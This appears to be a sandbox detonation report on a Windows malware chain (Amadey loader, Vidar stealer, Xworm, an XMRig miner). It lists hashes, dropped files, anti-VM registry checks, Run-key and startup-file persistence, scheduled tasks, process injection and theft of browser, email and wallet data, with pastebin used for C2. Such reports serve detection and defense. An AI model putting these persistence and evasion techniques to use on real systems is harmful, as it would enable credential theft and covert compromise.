| SHA512 | 01effe006b306f0d6d456cc268cc3bf3c35761e6e4e5e3487e348e450f3aed78cf17e840e756c09accac4c923bd97186521fc081a1162b75d4669ddbfc90ca45 |
memory/2108-671-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2408-672-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
| MD5 | 6006ae409307acc35ca6d0926b0f8685 |
| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/3420-685-0x0000000000FE0000-0x000000000147B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js
| MD5 | 42a55ffa2ffbc63efcb06872e64786f3 |
| SHA1 | 5cdee127d3bfd6d9f3548cc2c31e7b4f7a96587e |
| SHA256 | 579816094a6f2e79199c4b58a949b030a88273364115d6e6a888ad09e6194412 |
| SHA512 | ab48b0830c379040e1e847e9f7e31062850ac97a9760a0dfc3c7edd4688f7124c335f10572a58d789f46e263baefb6b593b0274da32d2b23dd95e2dce2110eea |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs-1.js
| MD5 | ec2d52962eeec7c1d536013b9b3e4399 |
| SHA1 | 89dde681ca7fcd89e856b3403c27252b06a13f54 |
| SHA256 | 776b553b4a2416d7994741b9231bafe346456203eab25d2ac318199b805f8015 |
| SHA512 | 6608fd089b0067ef4c61c1ed5323f4cce4b72f538d4f965ab020ee030f2a801d58dc313791714ea1b9f14358b1bac541dc0911247461ca89e7a9fa46feebf00b |
memory/2108-696-0x0000000000DA0000-0x000000000125F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/3800-707-0x0000000000FD0000-0x0000000001040000-memory.dmp
memory/896-721-0x0000000000400000-0x0000000000466000-memory.dmp
memory/896-712-0x0000000000400000-0x0000000000466000-memory.dmp
memory/896-709-0x0000000000400000-0x0000000000466000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/3504-732-0x0000000000830000-0x0000000000842000-memory.dmp
memory/3504-733-0x0000000000240000-0x0000000000250000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/4072-747-0x0000000000AA0000-0x0000000000B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
| MD5 | 9da08b49cdcc4a84b4a722d1006c2af8 |
| SHA1 | 7b5af0630b89bd2a19ae32aea30343330ca3a9eb |
| SHA256 | 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd |
| SHA512 | 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb |
memory/4012-864-0x000000001B890000-0x000000001BB72000-memory.dmp
memory/4012-865-0x0000000002770000-0x0000000002778000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe
| MD5 | f155a51c9042254e5e3d7734cd1c3ab0 |
| SHA1 | 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf |
| SHA256 | 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af |
| SHA512 | 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 23:06
Reported
2025-03-05 23:09
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LiteHTTP
Litehttp family
Vidar
Vidar family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses browser remote debugging
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\iSoxSIyN\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2788 set thread context of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe |
| PID 4044 set thread context of 2012 | N/A | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe |
| PID 3404 set thread context of 1436 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
